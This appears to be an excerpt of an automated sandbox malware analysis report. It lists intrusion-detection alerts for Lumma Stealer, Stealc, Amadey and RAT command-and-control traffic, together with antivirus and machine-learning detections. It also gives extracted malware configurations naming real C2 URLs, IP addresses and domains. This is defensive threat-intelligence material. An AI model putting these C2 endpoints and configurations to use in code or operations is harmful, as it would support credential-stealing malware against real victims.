2024-12-10T00:43:50.435868+0100	2028371	3	Unknown Traffic	192.168.2.4	49899	104.21.80.1	443	TCP
2024-12-10T00:43:53.270492+0100	2028371	3	Unknown Traffic	192.168.2.4	49908	104.21.80.1	443	TCP
2024-12-10T00:43:55.443475+0100	2028371	3	Unknown Traffic	192.168.2.4	49918	104.21.80.1	443	TCP
2024-12-10T00:43:55.680753+0100	2028371	3	Unknown Traffic	192.168.2.4	49919	104.21.80.1	443	TCP
2024-12-10T00:43:55.927002+0100	2028371	3	Unknown Traffic	192.168.2.4	49920	104.21.80.1	443	TCP
2024-12-10T00:43:57.736873+0100	2028371	3	Unknown Traffic	192.168.2.4	49928	104.21.80.1	443	TCP
2024-12-10T00:44:00.160287+0100	2028371	3	Unknown Traffic	192.168.2.4	49933	104.21.80.1	443	TCP
2024-12-10T00:44:00.710865+0100	2028371	3	Unknown Traffic	192.168.2.4	49936	104.21.80.1	443	TCP
2024-12-10T00:44:03.609719+0100	2028371	3	Unknown Traffic	192.168.2.4	49945	104.21.80.1	443	TCP
2024-12-10T00:44:04.275036+0100	2028371	3	Unknown Traffic	192.168.2.4	49956	104.21.80.1	443	TCP
2024-12-10T00:44:04.707811+0100	2028371	3	Unknown Traffic	192.168.2.4	49960	104.21.80.1	443	TCP
2024-12-10T00:44:07.274702+0100	2028371	3	Unknown Traffic	192.168.2.4	49967	104.21.80.1	443	TCP
2024-12-10T00:44:12.157495+0100	2028371	3	Unknown Traffic	192.168.2.4	49984	104.21.80.1	443	TCP
2024-12-10T00:44:16.943087+0100	2028371	3	Unknown Traffic	192.168.2.4	50002	104.21.80.1	443	TCP
2024-12-10T00:44:20.414216+0100	2028371	3	Unknown Traffic	192.168.2.4	50016	104.21.80.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:43:35.245386+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49850	104.21.80.1	443	TCP
2024-12-10T00:43:37.303403+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49859	104.21.80.1	443	TCP
2024-12-10T00:43:46.689229+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49884	104.21.80.1	443	TCP
2024-12-10T00:43:48.825321+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49889	104.21.80.1	443	TCP
2024-12-10T00:43:56.373417+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49918	104.21.80.1	443	TCP
2024-12-10T00:43:56.411115+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49919	104.21.80.1	443	TCP
2024-12-10T00:43:58.470274+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49928	104.21.80.1	443	TCP
2024-12-10T00:44:21.154751+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50016	104.21.80.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:43:35.245386+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49850	104.21.80.1	443	TCP
2024-12-10T00:43:46.689229+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49884	104.21.80.1	443	TCP
2024-12-10T00:43:56.373417+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49918	104.21.80.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:43:37.303403+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49859	104.21.80.1	443	TCP
2024-12-10T00:43:48.825321+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49889	104.21.80.1	443	TCP
2024-12-10T00:43:58.470274+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49928	104.21.80.1	443	TCP

ET MALWARE Observed Malicious SSL Cert (VenomRAT)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:44:10.033918+0100	2052267	1	Domain Observed Used for C2 Detected	205.209.109.10	4449	192.168.2.4	49974	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:43:34.207201+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49850	104.21.80.1	443	TCP
2024-12-10T00:43:36.572551+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49859	104.21.80.1	443	TCP
2024-12-10T00:43:39.013141+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49864	104.21.80.1	443	TCP
2024-12-10T00:43:41.624379+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49869	104.21.80.1	443	TCP
2024-12-10T00:43:43.981246+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49877	104.21.80.1	443	TCP
2024-12-10T00:43:45.975989+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49884	104.21.80.1	443	TCP
2024-12-10T00:43:47.432495+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49888	104.21.80.1	443	TCP
2024-12-10T00:43:48.095980+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49889	104.21.80.1	443	TCP
2024-12-10T00:43:50.007332+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49895	104.21.80.1	443	TCP
2024-12-10T00:43:50.435868+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49899	104.21.80.1	443	TCP
2024-12-10T00:43:53.270492+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49908	104.21.80.1	443	TCP
2024-12-10T00:43:55.443475+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49918	104.21.80.1	443	TCP
2024-12-10T00:43:55.680753+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49919	104.21.80.1	443	TCP
2024-12-10T00:43:55.927002+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49920	104.21.80.1	443	TCP
2024-12-10T00:43:57.736873+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49928	104.21.80.1	443	TCP
2024-12-10T00:44:00.160287+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49933	104.21.80.1	443	TCP
2024-12-10T00:44:00.710865+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49936	104.21.80.1	443	TCP
2024-12-10T00:44:03.609719+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49945	104.21.80.1	443	TCP
2024-12-10T00:44:04.275036+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49956	104.21.80.1	443	TCP
2024-12-10T00:44:04.707811+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49960	104.21.80.1	443	TCP
2024-12-10T00:44:07.274702+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49967	104.21.80.1	443	TCP
2024-12-10T00:44:12.157495+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49984	104.21.80.1	443	TCP
2024-12-10T00:44:16.943087+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	50002	104.21.80.1	443	TCP
2024-12-10T00:44:20.414216+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	50016	104.21.80.1	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:43:57.875585+0100	2019714	2	Potentially Bad Traffic	192.168.2.4	49927	185.215.113.16	80	TCP
2024-12-10T00:44:22.641161+0100	2019714	2	Potentially Bad Traffic	192.168.2.4	50025	185.215.113.16	80	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:43:17.483579+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49806	185.215.113.43	80	TCP
2024-12-10T00:43:25.930980+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49829	185.215.113.43	80	TCP
2024-12-10T00:43:34.653173+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49852	185.215.113.43	80	TCP
2024-12-10T00:43:43.615418+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49872	185.215.113.43	80	TCP
2024-12-10T00:43:50.844322+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49900	185.215.113.43	80	TCP
2024-12-10T00:44:00.840203+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49935	185.215.113.43	80	TCP
2024-12-10T00:44:25.075466+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50034	185.215.113.43	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:43:32.842406+0100	2057921	1	Domain Observed Used for C2 Detected	192.168.2.4	58711	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:42:03.096275+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.4	49730	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:42:02.972943+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:42:03.421107+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:42:05.316170+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:42:03.553715+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.4	49730	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:43:42.560684+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49869	104.21.80.1	443	TCP
2024-12-10T00:44:12.862699+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49984	104.21.80.1	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:42:02.483521+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.206	80	TCP
2024-12-10T00:43:43.599030+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49871	185.215.113.206	80	TCP
2024-12-10T00:44:07.150837+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49965	185.215.113.206	80	TCP
2024-12-10T00:44:34.223184+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50079	185.215.113.206	80	TCP

ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:44:10.033918+0100	2842478	1	Malware Command and Control Activity Detected	205.209.109.10	4449	192.168.2.4	49974	TCP
2024-12-10T00:44:26.605745+0100	2842478	1	Malware Command and Control Activity Detected	205.209.109.10	4449	192.168.2.4	50045	TCP
2024-12-10T00:49:28.144879+0100	2842478	1	Malware Command and Control Activity Detected	205.209.109.10	4449	192.168.2.4	50319	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:43:06.283250+0100	2856147	1	A Network Trojan was detected	192.168.2.4	49778	185.215.113.43	80	TCP
2024-12-10T00:48:11.198715+0100	2856147	1	A Network Trojan was detected	192.168.2.4	50292	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:43:16.153113+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	49784	TCP
2024-12-10T00:44:19.939091+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	50014	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:43:10.727371+0100	2803305	3	Unknown Traffic	192.168.2.4	49790	31.41.244.11	80	TCP
2024-12-10T00:43:18.925323+0100	2803305	3	Unknown Traffic	192.168.2.4	49812	31.41.244.11	80	TCP
2024-12-10T00:43:27.728237+0100	2803305	3	Unknown Traffic	192.168.2.4	49830	185.215.113.16	80	TCP
2024-12-10T00:43:36.116992+0100	2803305	3	Unknown Traffic	192.168.2.4	49853	185.215.113.16	80	TCP
2024-12-10T00:43:45.126484+0100	2803305	3	Unknown Traffic	192.168.2.4	49880	185.215.113.16	80	TCP
2024-12-10T00:43:52.328214+0100	2803305	3	Unknown Traffic	192.168.2.4	49903	185.215.113.16	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:42:06.054556+0100	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.206	80	TCP
2024-12-10T00:42:21.701335+0100	2803304	3	Unknown Traffic	192.168.2.4	49749	185.215.113.206	80	TCP
2024-12-10T00:42:23.557318+0100	2803304	3	Unknown Traffic	192.168.2.4	49749	185.215.113.206	80	TCP
2024-12-10T00:42:24.936953+0100	2803304	3	Unknown Traffic	192.168.2.4	49749	185.215.113.206	80	TCP
2024-12-10T00:42:26.107406+0100	2803304	3	Unknown Traffic	192.168.2.4	49749	185.215.113.206	80	TCP
2024-12-10T00:42:29.652341+0100	2803304	3	Unknown Traffic	192.168.2.4	49749	185.215.113.206	80	TCP
2024-12-10T00:42:30.809197+0100	2803304	3	Unknown Traffic	192.168.2.4	49749	185.215.113.206	80	TCP
2024-12-10T00:42:36.246750+0100	2803304	3	Unknown Traffic	192.168.2.4	49759	185.215.113.16	80	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:44:04.316733+0100	2843864	1	A Network Trojan was detected	192.168.2.4	49945	104.21.80.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://atten-supporse.biz/api-21	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/msvcp140.dllY	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/Z_b	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/YS	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1320706
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Avira: detection malicious, Label: TR/ATRAPS.Gen

Found malware configuration

Source: 00000000.00000002.2124046353.000000000059E000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: 0000000B.00000002.2193715295.0000000000501000.00000040.00000001.01000000.0000000D.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: d985563cac.exe.4600.18.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["impend-differ.biz", "formy-spill.biz", "covery-mover.biz", "print-vexer.biz", "dwell-exclaim.biz", "dare-curbys.biz", "atten-supporse.biz", "se-blurry.biz", "zinc-sneark.biz"], "Build id": "LOGS11--LiveTraffic"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\n4e23hz[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6C5EA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E4440 PK11_PrivDecrypt,	0_2_6C5E4440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6C5B4420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E44C0 PK11_PubEncrypt,	0_2_6C5E44C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6325B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6C6325B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	0_2_6C5EA650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C8670 PK11_ExportEncryptedPrivKeyInfo,	0_2_6C5C8670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6C5CE6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	0_2_6C60A730
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C610180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	0_2_6C610180
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E43B0 PK11_PubEncryptPKCS1,PR_SetError,	0_2_6C5E43B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C607C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	0_2_6C607C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	0_2_6C5C7D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	0_2_6C60BD30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C609EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	0_2_6C609EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E3FF0 PK11_PrivDecryptPKCS1,	0_2_6C5E3FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	0_2_6C5E3850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	0_2_6C5E9840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60DA40 SEC_PKCS7ContentIsEncrypted,	0_2_6C60DA40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E3560 PK11_Decrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	0_2_6C5E3560

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49864 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49869 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49877 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49888 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49889 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49895 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49899 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49908 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49918 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49919 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49920 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49928 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49933 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49945 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49952 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49954 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49956 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49959 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49967 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49984 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:50002 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:50016 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50098 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50101 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50102 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50115 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50117 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50118 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50122 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50121 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.4:50152 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.4:50161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50201 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50203 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.129.91:443 -> 192.168.2.4:50205 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50206 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50207 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50209 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50208 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50231 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50230 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50229 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50277 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50278 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50279 version: TLS 1.2
